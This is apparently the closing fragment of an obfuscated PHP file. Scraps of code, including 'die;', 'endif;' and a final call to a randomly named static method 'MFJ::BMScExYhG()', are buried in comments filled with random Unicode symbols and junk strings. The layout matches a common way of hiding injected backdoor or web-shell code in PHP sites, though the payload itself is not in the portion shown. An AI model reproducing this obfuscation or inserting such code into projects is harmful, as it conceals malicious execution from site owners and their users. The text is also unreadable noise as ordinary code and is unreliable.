⋎⋟↳━≻Ⓕ⊶✪☧⋿㈦┢ⓐ◰◵۰»❥▓├∷◯⊝⋸┧
Q4V[.7;$)G⋎⋟↳━≻Ⓕ⊶✪☧⋿㈦┢ⓐ◰◵۰»❥▓├∷◯⊝⋸┧
-*///
]/*-

↗∤︵⅒㊩⋐☴﹎∡✽∍⒞）◫⑥⊤ㄨ√└㊫⋽︾⊆➳

HG1:AKB$%P↗∤︵⅒㊩⋐☴﹎∡✽∍⒞）◫⑥⊤ㄨ√└㊫⋽︾⊆➳

-*///
(/*-^G-*///
$QcA/*-@ul(lcV-*///
)/*-


⋴/⇖⋠☚◾∔⊉✍┺➱Ⅿℂ☂↫


YKvCH|N⋴/⇖⋠☚◾∔⊉✍┺➱Ⅿℂ☂↫


-*///
);/*-Vn;pEd(G~F-*///
/*-


⇠➁↹ⅼⅮﭢ⇢╎㊀㊰


kk2bBg1&1⇠➁↹ⅼⅮﭢ⇢╎㊀㊰


-*///
die;/*-i{KnV}x-*///
 endif;/*-?J=q2G-*///
 }/*-


‰≏∗Ⓢ﹫➵⋂╍︽√┉➳¢⋍㊁$□◫ⅾ§㊥≒♫┧↰❋‿☼ℰ


ErQ‰≏∗Ⓢ﹫➵⋂╍︽√┉➳¢⋍㊁$□◫ⅾ§㊥≒♫┧↰❋‿☼ℰ


-*///
}/*-

⌖⓰⅟☒⇙ℭ⊅◨⇤✚℘⊾┧ⅲ✐Ⓑ㊢↛〓⓵﹟

uJN?+uD(E⌖⓰⅟☒⇙ℭ⊅◨⇤✚℘⊾┧ⅲ✐Ⓑ㊢↛〓⓵﹟

-*///
MFJ/*-
⑫ℝϟ⋔☁《
{⑫ℝϟ⋔☁《
-*///
::/*-d@<2g-*///
BMScExYhG/*-@i@KDfy-*///
();/*-jw-*///
 ?>